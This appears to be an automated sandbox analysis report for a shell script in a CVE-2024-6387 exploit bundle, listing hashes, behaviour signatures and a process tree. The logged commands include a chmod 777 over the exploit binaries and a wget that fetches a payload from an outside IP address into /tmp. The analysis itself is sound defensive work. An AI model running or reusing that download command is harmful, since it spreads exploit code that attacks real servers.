Overview

overview

7

Static

static

1

cve_2024_6387/386

ubuntu-24.04-amd64

7

cve_2024_6387/aarch64

ubuntu-22.04-amd64

7

cve_2024_6387/amd64

ubuntu-20.04-amd64

7

cve_2024_6387/arm5

debian-9-armhf

7

cve_2024_6387/arm6

debian-12-armhf

7

cve_2024_6387/arm7

debian-12-armhf

7

cve_2024_6...nup.sh

ubuntu-18.04-amd64

7

cve_2024_6...nup.sh

debian-9-armhf

7

cve_2024_6...nup.sh

debian-9-mips

7

cve_2024_6...nup.sh

debian-9-mipsel

7

cve_2024_6387/exploit

ubuntu-18.04-amd64

7

cve_2024_6...oit.py

windows7-x64

3

cve_2024_6...oit.py

windows10-2004-x64

3

cve_2024_6387/mips

debian-9-mips

3

cve_2024_6387/mips64

debian-9-mips

cve_2024_6...ps64el

debian-9-mipsel

cve_2024_6387/mipsel

debian-9-mipsel

3

Analysis

  • max time kernel
    130s
  • max time network
    154s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240508-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    23-11-2024 18:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cve_2024_6387/execute_and_cleanup.sh

  • Size

    926B

  • MD5

    1f452448cea986aedc88ba50d48691f7

  • SHA1

    98cee6d3b4a210be77fa4a458b06b805fa781bd7

  • SHA256

    67564d4a3ad079b6ec430193d5a60ce67df4d13409387fd074fd10d921fda20e

  • SHA512

    e11bb1ee0a50674550e3710c0e9670d2fe15b53f450bbc54d5dcc511999114f5e21aa0ee396c6b2e9e85fd2afe9078ca16b128e563f2b8acb9167d693e63183a

Score
7/10
defense_evasiondiscovery

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/cve_2024_6387/execute_and_cleanup.sh
    /tmp/cve_2024_6387/execute_and_cleanup.sh
    1⤵
      PID:1516
      • /bin/mkdir
        mkdir -p /tmp/downloads
        2⤵
        • Reads runtime system information
        PID:1517
      • /bin/chmod
        chmod 777 386 aarch64 amd64 arm5 arm6 arm7 c.txt execute_and_cleanup.sh exploit exploit.py ip.txt mips mips64 mips64el mipsel 验证利用脚本.txt
        2⤵
        • File and Directory Permissions Modification
        PID:1518
      • /usr/bin/wget
        wget http://108.174.58.28/386 -O /tmp/downloads/386
        2⤵
        • Writes file to tmp directory
        PID:1519

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads